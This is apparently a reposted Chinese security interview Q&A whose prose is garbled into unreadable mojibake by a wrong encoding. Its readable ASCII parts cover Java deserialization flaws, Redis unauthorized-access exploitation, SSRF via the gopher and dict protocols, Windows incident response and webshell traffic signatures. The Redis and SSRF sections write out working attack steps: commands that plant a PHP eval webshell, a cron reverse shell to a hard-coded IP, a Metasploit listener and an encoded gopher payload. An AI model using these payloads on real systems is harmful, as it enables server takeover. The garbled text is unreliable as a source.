¡£ÈôÊÇÕâЩº¯ÊýÔÚת´ï²ÎÊýʱûÓоÙÐÐÑÏ¿áµÄ¹ýÂ˲½·¥£¬ÄÇô¹¥»÷Õ߾ͿÉÒԽṹ¶ñÒâ´úÂë²¢½«ÆäÐòÁл¯ºó´«È뺯ÊýÖУ¬´Ó¶øµ¼Ö·´ÐòÁл¯Îó²î ¡£

Java·´ÐòÁл¯

Java·´ÐòÁл¯¾ÍÊǽ«java¹¤¾ßת»¯Îª×Ö½ÚÐòÁеÄÀú³Ì ¡£·´ÐòÁл¯µÄÀú³Ì¾ÍÊÇ

1£¬½¨ÉèÒ»¸ö¹¤¾ßÊä³öÁ÷

2£¬Í¨¹ý¹¤¾ßÊä³öÁ÷µÄReadObject()ÒªÁìÀ´¶ÁÈ¡¹¤¾ß

Ê®Áù. ³£¼ûµÄ¿ò¼ÜÎó²î £¿

´ð£º

log4jÔ¶³Ì´úÂëÖ´ÐÐÎó²î

Ô­Àí£º

Log4j ÊÇApache µÄÒ»¸ö¿ªÔ´ÏîÄ¿£¬ÊÇÒ»¿î»ùÓÚJava µÄ¿ªÔ´ÈÕÖ¾¼Í¼¹¤¾ß ¡£¸ÃÎó²îÖ÷ÒªÊÇÓÉÓÚÈÕÖ¾ÔÚ´òӡʱµ±Óöµ½`${`ºó£¬ÒÔ:ºÅ×÷Ϊ֧½â£¬½«±í´ïʽÄÚÈÝÖ§½â³ÉÁ½²¿·Ö£¬Ç°ÃæÒ»²¿·Öprefix£¬ºóÃæ²¿·Ö×÷Ϊkey£¬È»ºóͨ¹ýprefixÈ¥ÕÒ¶ÔÓ¦µÄlookup£¬Í¨¹ý¶ÔÓ¦µÄlookupʵÀýŲÓÃlookupÒªÁ죬×îºó½«key×÷Ϊ²ÎÊý´øÈëÖ´ÐУ¬Òý·¢Ô¶³Ì´úÂëÖ´ÐÐÎó²î ¡£

Ïêϸ²Ù×÷£º

ÔÚÕý³£µÄlog´¦Öóͷ£Àú³ÌÖжÔ**${**ÕâÁ½¸ö½ôÁÚµÄ×Ö·û×öÁ˼ì²â£¬Ò»µ©Æ¥Åäµ½ÀàËÆÓÚ±í´ïʽ½á¹¹µÄ×Ö·û´®¾Í»á´¥·¢Ìæ»»»úÖÆ£¬½«±í´ïʽµÄÄÚÈÝÌæ»»Îª±í´ïʽÆÊÎöºóµÄÄÚÈÝ£¬¶ø²»ÊDZí´ïʽ×Ô¼º£¬´Ó¶øµ¼Ö¹¥»÷Õ߽ṹÇкÏÒªÇóµÄ±í´ïʽ¹©ÏµÍ³Ö´ÐÐ

Fastjson·´ÐòÁл¯Îó²î

Åжϣº

Õý³£ÇëÇóÊÇgetÇëÇó²¢ÇÒûÓÐÇëÇóÌ壬¿ÉÒÔͨ¹ý½á¹¹¹ýʧµÄPOSTÇëÇ󣬼´¿ÉÉó²éÔÚ·µ»Ø°üÖÐÊÇ·ñÓÐfastjsonÕâ¸ö×Ö·û´®À´ÅжÏ ¡£

Ô­Àí£º

fastjsonÊǰ¢Àï°Í°Í¿ª·¢µÄÒ»¿î½«json×Ö·û´®ºÍjava¹¤¾ß¾ÙÐÐÐòÁл¯ºÍ·´ÐòÁл¯µÄ¿ªÔ´jsonÆÊÎö¿â ¡£fastjsonÌṩÁËautotype¹¦Ð§£¬ÔÚÇëÇóÀú³ÌÖУ¬ÎÒÃÇ¿ÉÒÔÔÚÇëÇó°üÖÐͨ¹ýÐÞ¸Ä@typeµÄÖµ£¬À´·´ÐòÁл¯ÎªÖ¸¶¨µÄÀàÐÍ£¬¶øfastjsonÔÚ·´ÐòÁл¯Àú³ÌÖлáÉèÖúͻñÈ¡ÀàÖеÄÊôÐÔ£¬ÈôÊÇÀàÖб£´æ¶ñÒâÒªÁ죬¾Í»áµ¼Ö´úÂëÖ´ÐеÈÕâÀàÎÊÌâ ¡£

ÎÞ»ØÏÔÔõô°ì£º

1.Ò»ÖÖÊÇÖ±½Ó½«ÏÂÁîÖ´ÐÐЧ¹ûдÈëµ½¾²Ì¬×ÊÔ´ÎļþÀÈçhtml¡¢jsµÈ£¬È»ºóͨ¹ýhttp»á¼û¾Í¿ÉÒÔÖ±½Ó¿´µ½Ð§¹û

2.ͨ¹ýdnslog¾ÙÐÐÊý¾ÝÍâ´ø£¬µ«ÈôÊÇÎÞ·¨Ö´ÐÐdnsÇëÇó¾ÍÎÞ·¨ÑéÖ¤ÁË

3.Ö±½Ó½«ÏÂÁîÖ´ÐÐЧ¹û»ØÏÔµ½ÇëÇóPocµÄHTTPÏìÓ¦ÖÐ

Shiro·´ÐòÁл¯Îó²î

Ô­Àí£º

ShiroÊÇApacheϵÄÒ»¸ö¿ªÔ´JavaÇå¾²¿ò¼Ü£¬Ö´ÐÐÉí·ÝÈÏÖ¤£¬ÊÚȨ£¬ÃÜÂëºÍ»á»°ÖÎÀí ¡£shiroÔÚÓû§µÇ¼ʱ³ýÁËÕ˺ÅÃÜÂëÍ⻹ÌṩÁË¿Éת´ïÑ¡Ïîremember me ¡£Óû§ÔڵǼʱÈôÊǹ´Ñ¡ÁËremember meÑ¡ÏÄÇôÔÚÏÂÒ»´ÎµÇ¼ʱä¯ÀÀÆ÷»áЯ´øcookieÖеÄremember me×Ö¶ÎÌᳫÇëÇ󣬾Ͳ»ÐèÒªÖØÐÂÊäÈëÓû§ÃûºÍÃÜÂë ¡£

Åжϣº

1.Êý¾Ý·µ»Ø°üÖаüÀ¨rememberMe=deleteMe×Ö¶Î ¡£

2.Ö±½Ó·¢ËÍÔ­Êý¾Ý°ü£¬·µ»ØµÄÊý¾ÝÖв»±£´æÒªº¦×Ö¿ÉÒÔͨ¹ýÔÚ·¢ËÍÊý¾Ý°üµÄcookieÖÐÔöÌí×ֶΣº****rememberMe=È»ºóÉó²é·µ»ØÊý¾Ý°üÖÐÊÇ·ñ±£´æÒªº¦×Ö ¡£

shiro-550£º

shiro·´ÐòÁл¯Îó²îʹÓÃÓÐÁ½¸öÒªº¦µã£¬Ê×ÏÈÊÇÔÚshiro<1.2.4ʱ£¬AES¼ÓÃܵÄÃÜÔ¿Key±»Ó²±àÂëÔÚ´úÂëÀֻҪÄÜ»ñÈ¡µ½Õâ¸ökey¾Í¿ÉÒԽṹ¶ñÒâÊý¾ÝÈÃshiroʶ±ðΪÕý³£Êý¾Ý ¡£ÁíÍâ¾ÍÊÇshiroÔÚÑéÖ¤rememberMeʱʹÓÃÁËreadObjectÒªÁ죬readObjectÓÃÀ´Ö´Ðз´ÐòÁл¯ºóÐèÒªÖ´ÐеĴúÂëÆ¬¶Ï£¬´Ó¶øÔì³É¶ñÒâÏÂÁî¿ÉÒÔ±»Ö´ÐÐ ¡£¹¥»÷Õ߽ṹ¶ñÒâ´úÂ룬²¢ÇÒÐòÁл¯£¬AES¼ÓÃÜ£¬base64±àÂëºó£¬×÷ΪcookieµÄrememberMe×ֶη¢ËÍ ¡£Shiro½«rememberMe¾ÙÐбàÂ룬½âÃܲ¢ÇÒ·´ÐòÁл¯£¬×îÖÕÔì³É·´ÐòÁл¯Îó²î ¡£

shiro-721£º

²»ÐèÒªkey£¬Ê¹ÓÃPadding Oracle Attack½á¹¹³öRememberMe×ֶκó¶ÎµÄֵ͎áÕýµ±µÄRemember ¡£

Ê®Æß.Ïàʶ¹ýredisÊý¾Ý¿âºÍ³£¼ûµÄÎó²îÂ𠣿

´ð£º

redisÊÇÒ»¸ö·Ç¹ØÏµÐÍÊý¾Ý¿â£¬Ê¹ÓõÄĬÈ϶˿ÚÊÇ6379 ¡£³£¼ûµÄÎó²îÊÇδÊÚȨ»á¼ûÎó²î£¬¹¥»÷ÕßÎÞÐèÈÏÖ¤¾Í¿ÉÒÔ»á¼ûÄÚ²¿Êý¾Ý ¡£Ê¹ÓÃÊÖ¶ÎÖ÷ÒªÓУº

1.ÏòrootȨÏÞÕË»§Ð´Èëssh¹«Ô¿Îļþ£¬Ö±½ÓÃâÃܵǼ·þÎñÆ÷ ¡£(Êܺ¦Õßredis·ÇrootȨÏÞÔËÐлᱨ´í)

Ìõ¼þ£º

·þÎñÆ÷±£´æ.sshĿ¼ÇÒ¾ßÓÐдÈëµÄȨÏÞ

Ô­Àí£º

ÔÚÊý¾Ý¿âÖвåÈëÒ»ÌõÊý¾Ý£¬½«±¾»úµÄ¹«Ô¿×÷Ϊvalue£¬keyÖµËæÒ⣬Ȼºóͨ¹ýÐÞ¸ÄÊý¾Ý¿âµÄĬÈÏ·¾¶Îª/root/.sshºÍĬÈϵĻº³åÎļþauthorized.keys£¬°Ñ»º³åµÄÊý¾ÝÉúÑÄÔÚÎļþÀÕâÑù¾Í¿ÉÒÔÔÚ·þÎñÆ÷¶ËµÄ/root/.sshÏÂÌìÉúÒ»¸öÊÚȨµÄkey ¡£

2.дÈëwebshell

Ìõ¼þ£º

ÒÑÖªweb¾ø¶Ô·¾¶ ¡£

°ì·¨£º

1. redis -cli -h 192.168.x.x ÅþÁ¬Ä¿µÄ·þÎñÆ÷

2. config set dir "/var/www/html" ÉèÖÃÉúÑÄÎļþ·¾¶

3. config set dbfilename shell.php ÉèÖÃÉúÑÄÎļþÃû

4. set x "\n\n<?php @eval($_POST['cmd']); ?>\n" ½«webshellдÈëx¼üÖµÖÐ

5. save ÉúÑÄ

¾ÖÏÞ£º

1.·þÎñÆ÷´¦ÓÚÄÚÍø£¬Ð´ÈëwebshellºóÎÒÃǵĹ«ÍøIPÎÞ·¨ÅþÁ¬

2.·þÎñÆ÷IPµØµã²»Àο¿

3.6379¶Ë¿Ú²»ÔÊÐíÈëÆ«Ïò

4.ÉÏ´«webshell¿ÉÄÜÖ±½Ó±»É±¶¾Èí¼þɾ³ý

3.·´µ¯ÅþÁ¬shell

ÉèÖüàÌý¶Ë¿Ú£¬³£ÓõŤ¾ß1.msf 2.netcat 3.socatʹÓÃmsfÉèÖüàÌý°ì·¨£º1. use exploit/multi/handler2. set payload generic/shell_reverse_tcp3. set lhost 192.168.x.x ĬÈϼàÌý¶Ë¿ÚΪ44444. run

4.׼ʱʹÃü·´µ¯shell

°ì·¨£º×¼Ê±Ê¹ÃüÓõıí´ïʽ £ºCron±í´ïʽÊÇÒ»¸ö×Ö·û´®£¬¸Ã×Ö·û´®ÓÉ6¸ö¿Õ¸ñ·ÖΪ7¸öÓò£¬Ã¿Ò»¸öÓò´ú±íÒ»¸öʱ¼ä¼ÄÒå ¡£·Ö ʱ Ìì Ô ÖÜ user-name(Óû§) command(ÏÂÁî) ºÃ±Èÿ¹ýÒ»·ÖÖÓÏòrootÓû§µÄ׼ʱʹÃüÖÐдÈë·´µ¯ÅþÁ¬ÏÂÁî(1) config set dir /var/spool/cron/ //Ŀ¼Çл»µ½×¼Ê±Ê¹ÃüµÄÎļþ¼ÐÖÐ(2) config set dbfilename root //ÉèÖÃÉúÑÄÎļþÃû(3)set x "\n * * * * * bash -i >& /dev/tcp/192.168.96.222/7777 0>&1\n" //½«·´µ¯shellдÈëx¼üÖµÖÐ(4)save //ÉúÑÄ

ʹÓÃ׼ʱʹÃü·´µ¯shellÔÚÄ¿µÄϵͳÊÇCentosÉÏ¿ÉÓã¬UbuntuÉÏÓÐÏÞÖÆ

ÀíÓÉÈçÏ£º

1.ĬÈÏredisдÎļþºóÊÇ644µÄȨÏÞ£¬µ«ubuntuÒªÇóÖ´ÐÐ׼ʱʹÃü¼þ/var/spool/cron/crontabs/ȨÏÞ±ØÐèÊÇ600Ò²¾ÍÊÇ-rw-------²Å»áÖ´ÐУ¬²»È»»á±¨´í£¬¶øCentosµÄ׼ʱʹÃüÎļþȨÏÞ644Ò²ÄÜÖ´ÐÐ2.redisÉúÑÄRDB»á±£´æÂÒÂ룬ÔÚUbuntuÉϻᱨ´í£¬¶øÔÚCentosÉϲ»»á±¨´í3.Á½¸öϵͳµÄ׼ʱʹÃüÎļþĿ¼²î±ð

ʹÓÃÖ÷´Ó¸´ÖÆgetshell

Ìõ¼þ£º°æ±¾(4.x~5.0.5)Ô­Àí£ºÊý¾Ý¶ÁдÌåÁ¿ºÜ´óʱ£¬ÎªÁ˼õÇá·þÎñÆ÷µÄѹÁ¦£¬redisÌṩÁËÖ÷´Óģʽ£¬Ö÷´Óģʽ¾ÍÊÇÖ¸¶¨Ò»¸öredisʵÀý×÷ΪÖ÷»ú£¬ÆäÓàµÄ×÷Ϊ´Ó»ú£¬ÆäÖÐÖ÷»úºÍ´Ó»úµÄÊý¾ÝÊÇÏàͬµÄ£¬¶ø´Ó»úÖ»ÈÏÕæ¶Á£¬Ö÷»úÖ»ÈÏÕæÐ´ ¡£Í¨¹ý¶ÁдÊèÉ¢¿ÉÒÔ¼õÇá·þÎñÆ÷¶ËµÄѹÁ¦ ¡£Ê¹Óù¤¾ß£ºRedisRogueServerµØµã£ºhttps://github.com/n0b0dyCN/redis-rogue-serverʹÓù¤¾ßµÄÏÂÁpython3 redis-rogue-server.py --rhost=x.x.x.x --lhost=x.x.x.x --exp=exp.soÁ½ÖÖʹÓÃÒªÁ죺½»»¥Ê½·´µ¯Ê½ÏÞÖÆ£ºÊ¹ÓÃÕâ¸öÒªÁìgetshell»òÕßrceí§Òâµ¼ÖÂredis·þÎṉ̃»¾£¬Ò»Ñùƽ³£²»½¨ÒéʹÓÃ

redisδÊÚȨ»á¼ûÎó²îµÄÌá·À²½·¥£º

1.Ìí¼ÓµÇ¼ÃÜÂë

2.ÐÞ¸ÄĬÈ϶˿Ú

3.¹Ø±Õ¶Ë¿Ú

4.եȡÒÔrootÓû§È¨ÏÞÆô¶¯£¬ÒÔµÍȨÏÞÆô¶¯redis·þÎñ

Ê®°Ë. SSRFÔõôÍŽáRedisÏà¹ØÎó²îʹÓà £¿

´ð£º

Ö÷Ҫͨ¹ýÁ½ÖÖЭÒ飬dictЭæÅºÍgopherЭÒé ¡£

dictЭÒéʹÓÃredisÏà¹ØÎó²î£º

̽²â¶Ë¿Ú£º

ssrf.php?url=dict://x.x.x.x:$¶Ë¿Ú$ ʹÓÃburpsuite±¬ÆÆ¶Ë¿Ú

̽²âÊÇ·ñÉèÖÃÈõ¿ÚÁ

ssrf.php?url=dict://x.x.x.x:6379/info ÒÑÖª¶Ë¿ÚʹÓÃinfo̽²âÊÇ·ñÉèÖÃÁËÃÜÂë

±¬ÆÆÃÜÂ룺

ssrf.php?url=dict://x.x.x.x:6379/auth:$ÃÜÂë$ ʹÓÃburpsuite±¬ÆÆÃÜÂë

дÈëwebshell£º

1. url=dict://xxx.xxx:6379/config:set:dir:/var/www/html Çл»ÎļþĿ¼2. url=dict://xxx.xxx:6379/config:set:dbfilename:webshell.php ÉèÖÃÉúÑÄÎļþÃû3. url=dict://xxx.xxx:6379/set:webshell:"\x3c\x3f\x70\x68\x70\x20\x70\x68\x70\x69\x6e\x66\x6f\x28\x29\x3b\x3f\x3e" //ʹÓÃdictЭÒéдÈëwebshell ÒÔÉϵÄ×Ö·û±àÂëÊÇ<?php phpinfo();?>µÄÊ®Áù½øÖÆ4. url=dict://x.x.x.x:6379/save ÉúÑÄ

1. url=dict://xxx.xxx:6379/config:set:dir:/var/www/html Çл»ÎļþĿ¼

2. url=dict://xxx.xxx:6379/config:set:dbfilename:webshell.php ÉèÖÃÉúÑÄÎļþÃû

3. url=dict://xxx.xxx:6379/set:webshell:"\x3c\x3f\x70\x68\x70\x20\x70\x68\x70\x69\x6e\x66\x6f\x28\x29\x3b\x3f\x3e"

//ʹÓÃdictЭÒéдÈëwebshell ÒÔÉϵÄ×Ö·û±àÂëÊÇ<?php phpinfo();?>µÄÊ®Áù½øÖÆ

4.ssrf.php?url=dict://x.x.x.x:6379/save ÉúÑÄ

dictЭÒéʹÓÃÍýÏëʹÃü·´µ¯shell»òÕßдÈëssh¹«Ô¿µÄÊÖ¶ÎÀàËÆ

gopherЭÒéʹÓÃredisδÊÚȨ»á¼ûÎó²îдÈëwebshell£º

ͨÀýʹÓð취£º

set x "\n\n\n<?php @eval($_POST['redis']);?>\n\n\n"

config set dir /var/www/html

config set dbfilename shell.php

save

Á½´Îurl±àÂëºó½á¹¹url£º

http://192.168.1.1/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%34%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%32%37%25%37%32%25%36%35%25%36%34%25%36%39%25%37%33%25%32%37%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%32%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%30%25%32%30%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%33%25%36%38%25%36%35%25%36%63%25%36%63%25%32%65%25%37%30%25%36%38%25%37%30%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35

//µÚÒ»´Îurl½âÂëºÍµÚ¶þ´Îurl½âÂë

//ͬÀíÆäËûÀàËÆÍýÏëʹÃü·´µ¯ºÍдÈëssh¹«Ô¿µÈgetshell·½·¨ÏàËÆ

Ê®¾Å. windowsÓ¦¼±ÏìӦʱÅŲéÆÊÎöµÄÏà¹ØÏ¸½Ú £¿

´ð£º

¿ÉÒÉÕ˺ÅÅŲé lusrmgr.msc

1.¼ì²é·þÎñÆ÷ÊÇ·ñÓÐÈõ¿ÚÁî ¡£ºÃ±È¿Õ¿ÚÁî»òÕßÃÜÂëÖØÆ¯ºó²»·ó ¡£

2.¸ßΣ¶Ë¿ÚÊÇ·ñ¶ÔÍ⿪·Å£¬ºÃ±ÈSSH·þÎñ22¶Ë¿Ú£¬RDP·þÎñ3389¶Ë¿ÚµÈ ¡£

3.Éó²é·þÎñÆ÷ÊÇ·ñÓпÉÒÉÕ˺Å ¡£

ÊÖ¹¤·½Ã棺lusrmgr.mscÏÂÁîÉó²éÓû§ºÍ×飬Éó²éÊÇ·ñÓÐÐÂÔöÕ˺Å£¬Òþ²ØÕ˺Å£¬¿Ë¡Õ˺Å ¡£

¹¤¾ß·½Ã棺ºÃ±ÈʹÓÃD¶ÜµÈ¹¤¾ßÀ´¼ì²âÒþ²ØÕ˺Å ¡£

4.ÍŽáÈÕÖ¾ÆÊÎö eventvwr.msc Éó²éÖÎÀíÔ±µÇ¼ʱ¼ä£¬Ïà¹ØÊÂÎñÊÇ·ñÓÐÒì³£ ¡£

Ãô¸ÐÊÂÎñID£º

4624 µÇ¼ÀÖ³É

4625 µÇ¼ʧ°Ü

4672 ʹÓó¬µÈÖÎÀíÔ±¾ÙÐеǼ

4720 ½¨ÉèÓû§

5.ʹÓÃquery userÉó²éÄ¿½ñϵͳµÄ»á»°£¬ºÃ±ÈÉó²éÊÇ·ñÓÐÈËʹÓÃÔ¶³ÌµÇ¼·þÎñÆ÷ ¡£

¿ÉÒÉÀú³ÌºÍ·þÎñÅŲé taskmgr services.msc

1.Éó²éCPU£¬ÄÚ´æ£¬ÍøÂçµÈ×ÊÔ´ÊÇ·ñÓпÉÒÉ״̬ ¡£ºÃ±ÈCPUÕ¼ÓÃÂʹý¸ß¿ÉÄÜÊÇÖÐÁËÍڿ󲡶¾£¬´ÅÅ̿ռä´ó×ÚÕ¼ÓÿÉÄÜÊǾ籾»ò²¡¶¾´ó×ÚÌìÉúºÍ¸´ÖÆÒþ²ØÎļþ ¡£

2.¼ì²éÀú³ÌÃû

ijЩÀú³ÌÃûÊÇ´ó×ÚËæ»úµÄÇéÐΣ¬ºÃ±ÈhrlC3.tmp¡¢hrlD5.tmp¡¢hrl6.tmp¡¢hrlEE.tmpµÈ¶à¸öÃû×ÖÏàËÆµÄÀú³Ì£¬»ù±¾ÉÏ¿ÉÒԶ϶¨ÊÇÒì³£Àú³Ì ¡£

Òì³£Àú³ÌÃûαװ³ÉϵͳÀú³Ì»òÕß˵³£¼û·þÎñµÄÀú³ÌÃû£¬´Ëʱ¿ÉÒÔͨ¹ýÀú³ÌÐÎòÀ´ÅжÏ£¬²¢ÇÒÐèÒªÊÖ¹¤±ÈÕÕ ¡£

3.¼ì²éÀú³ÌºÍ·þÎñÐÎò£¬ÐÞ¸Äʱ¼ä»òÕßÊý×ÖÊðÃûÊÇ·ñÓÐÒì³£ ¡£

4.ʹÓù¤¾ß¾ÙÐмì²â£¬ºÃ±ÈProcess Hunter»òÕß»ðÈÞ½£µÈרÃÅÕë¶ÔÀú³Ì·þÎñÐÅÏ¢µÄÅŲéÆÊÎö¹¤¾ß£¬Ö÷ÒªÉó²éµÄÊǹ«Ë¾Ãû£¬ÐÎò£¬Ç徲״̬ºÍÆô¶¯ÀàÐ͵ȷ½ÃæÀ´ÅŲé ¡£

¿ÉÒÉÆô¶¯ÏîÅŲé msconfig

1. msconfig»òÕßʹÃüÖÎÀíÆ÷ÖÐµÄÆô¶¯ÏîÉó²éÃû³Æ£¬Ðû²¼ÕßºÍÆô¶¯Ó°Ï죬ÒÔ¼°ÓÒ¼üÉó²éÊôÐÔÀ´¿´Êý×ÖÊðÃûºÍÐÞ¸Äʱ¼ä ¡£

2. ÍŽṤ¾ß¾ÙÐÐÅŲ飬ºÃ±È»ðÈÞ½£µÈ¹¤¾ß£¬»á½«Æô¶¯Ïî·ÖÀàΪµÇ¼£¬Çý¶¯³ÌÐò£¬ÍýÏëʹÃü£¬Ó³ÏñÐ®ÖÆµÈ£¬Ê¹ÓÃÆÊÎöÅŲé

¿ÉÒÉÎļþÅŲé

1.¸÷¸ö´ÅÅ̵ÄTemp/tmpĿ¼ÖÐÊÇWindows±¬·¢µÄÔÝʱÎļþ£¬Éó²éÓÐÎÞÒì³£Îļþ ¡£

2.RecentĿ¼»á¼Í¼×î½ü·­¿ªµÄÎĵµÒÔ¼°³ÌÐòµÄÏà¹Ø¼Í¼ ¡£

3.Éó²éÎļþµÄ½¨Éèʱ¼ä£¬ÐÞ¸Äʱ¼äºÍ»á¼ûʱ¼ä£¬ºÃ±È˵¹¥»÷ÕßʹÓò˵¶µÈ¹¤¾ß¶ÔÎļþ¾ÙÐÐÐ޸Ļá¸Ä±äÐÞ¸Äʱ¼ä£¬ÈôÊÇÐÞ¸Äʱ¼äÔÚ½¨Éèʱ¼ä֮ǰ£¬ÄǾÍÊǺÜÏÔ×ŵĿÉÒÉÎļþ ¡£

4.windowsϵͳÎҵĵçÄÔ¿ìËÙ»á¼û£¬¿ÉÒÔ¿´µ½×î½üʹÓõÄÎļþ£¬ºÃ±È˵ͼƬ»òÕßѹËõ°üµÈÎļþµÄʹÓÃÀúÊ·ºÍÎļþ·¾¶¶¼»áÏÔʾ ¡£

¶ñÒâÑù±¾ÅŲé

1.¶ñÒâÑù±¾Ö¸µÄÒ»Ñùƽ³£ÊÇwebshell£¬²¡¶¾£¬Ä¾Âí»òÕߺóÃųÌÐò»òÎļþ£¬¿ÉÒÔÆ¾Ö¤×°±¸µÄ¸æ¾¯ÐÅÏ¢À´²éÕÒÏà¹ØÂ·¾¶£¬ÔÙÅŲéÏà¹ØµÄÀú³ÌºÍÆô¶¯Ïî ¡£

2.²»Öªõè¾¶¾¶µÄ»°¿ÉÒÔʹÓÃÏà¹ØµÄÇå¾²×°±¸À´¾ÙÐмì²â£¬ºÃ±È˵ͨ¹ýD¶Ü£¬ºÓÂí²éɱµÈ¹¤¾ß¶Ôwebshell¿ÉÄܱ£´æµÄĿ¼¾ÙÐÐÒ»¸öÅŲé²éɱ£¬Ê¹ÓÃͨÀýµÄ·À»ðǽÈí¼þÀ´¶ÔͨÅÌ»òÕß¿ÉÒÉĿ¼ɨÃ財¶¾ ¡£

¶þÊ®. ³£¼ûµÄwebshellÅþÁ¬¹¤¾ßÁ÷Á¿ £¿

´ð£º

Öйú²Ëµ¶

ÅþÁ¬Àú³ÌÖÐʹÓÃbase64±àÂë¶Ô·¢Ë͵ÄÖ¸Áî¾ÙÐмÓÃÜ£¬ÆäÖÐÁ½¸öÒªº¦payload z1 ºÍ z2£¬Ãû×Ö¶¼ÊǿɱäµÄ ¡£

È»ºóÉÐÓÐÒ»¶ÎÒÔQG¿ªÍ·£¬7J×îºóµÄÀο¿´úÂë ¡£

ÒϽ£

ĬÈϵÄuser-agentÇëÇóÍ·ÊÇantsword xxx£¬²»¹ý¿ÉÒÔÐÞ¸Ä ¡£

Ò»Ñùƽ³£½«payload¾ÙÐзֶΣ¬È»ºó»®·Ö¾ÙÐÐbase64±àÂ룬һÑùƽ³£¾ßÓÐÏñevalÕâÑùµÄÒªº¦×Ö£¬È»ºóÄØ»òÐíÂÊÉÐÓÐ@ini_set("display","0");Õâ¶Î´úÂë ¡£

±ùЫ

php´úÂëÖпÉÄܱ£´æeval£¬assertµÈÒªº¦´Ê£¬jsp´úÂëÖпÉÄÜ»áÓÐgetclass()£¬getclassLoader()µÈ×Ö·ûÌØÕ÷ ¡£

±ùЫ2.0

µÚÒ»½×¶ÎÇëÇóÖзµ»Ø°üµÄ״̬ÂëÊÇ200£¬·µ»ØÄÚÈÝÊÇ16λµÄÃÜÔ¿ ¡£½¨ÉèÅþÁ¬ºóµÄcookieÃûÌö¼ÊÇCookie£ºPHPSessid=xxxx £»path=/£»ÌØÕ÷ ¡£

±ùЫ3.0

ÇëÇó°üÖеÄconten-length×Ö¶ÎÊÇ5740»òÕß5720£¬È»ºóÇëÇóÍ·Ò²¾ßÓÐÌØÕ÷ÐÅÏ¢£¬²»¹ýÕâ¸ö½ÏÁ¿³¤£¬Ã»ÓмÇ×Å ¡£

¸ç˹À­

1.jsp´úÂëÖпÉÄÜ»á¾ßÓÐgetclass£¬getclassLoaderµÈÒªº¦×Ö£¬payloadʹÓÃbase64±àÂëµÈÌØÕ÷ ¡£phpºÍaspÔòÊÇͨË×µÄÒ»¾ä»°Ä¾Âí ¡£

2.ÔÚÏìÓ¦°üµÄcache-control×Ö¶ÎÖÐÓÐno-store£¬no-cacheµÈÌØÕ÷ ¡£

3.ËùÓÐÇëÇóÖеÄcookie×Ö¶Î×îºóÃæ¶¼±£´æ£»ÌØÕ÷

¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª

×÷ÕߣºÈȰ®»­¼Ò·òÈË

Ô­ÎÄÁ´½Ó£ºhttps://blog.csdn.net/zlloveyouforever/article/details/125174473

Òªº¦´Ê±êÇ©£º
¹¤¾ßɨÃè wiresharkÍøÂç·â°üÆÊÎö¹¤¾ß
¿Í»§·þÎñÈÈÏß

400-777-0777
7*24Сʱ·þÎñ

ÁªÏµÓÊÏä

servicing@topsec.com.cn

ɨÂë¹Ø×¢
ÍøÕ¾µØÍ¼